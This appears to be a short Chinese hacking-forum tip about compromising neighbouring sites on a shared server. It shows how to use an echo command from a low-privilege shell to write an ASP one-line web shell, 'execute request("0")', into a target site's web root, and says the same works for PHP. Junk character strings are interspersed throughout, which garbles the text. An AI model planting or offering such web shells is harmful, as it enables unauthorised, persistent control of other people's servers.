在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。! m# z* [+ G/ o1 S( ^+ W
* v& F4 ~( E; }4 g9 Z V9 a9 _1 V4 ^命令格式
, E, M0 o3 }- k7 V! a$ J$ G# g5 I A3 W# G; f9 q2 j& `9 l
Echo 语句 >目标站绝对目录% m+ E2 ~5 u* K( H8 I
9 J5 l" v" c- J* [例如: 3 } H* h5 J. Y5 Q+ g
+ V5 o, B% ?7 A6 X
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp5 I+ k% j* F; W F- l) E) D0 x
- \ O) c- }% I0 I U) T. R6 i ^" k
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。" Y$ L/ {0 C& Z8 ~
|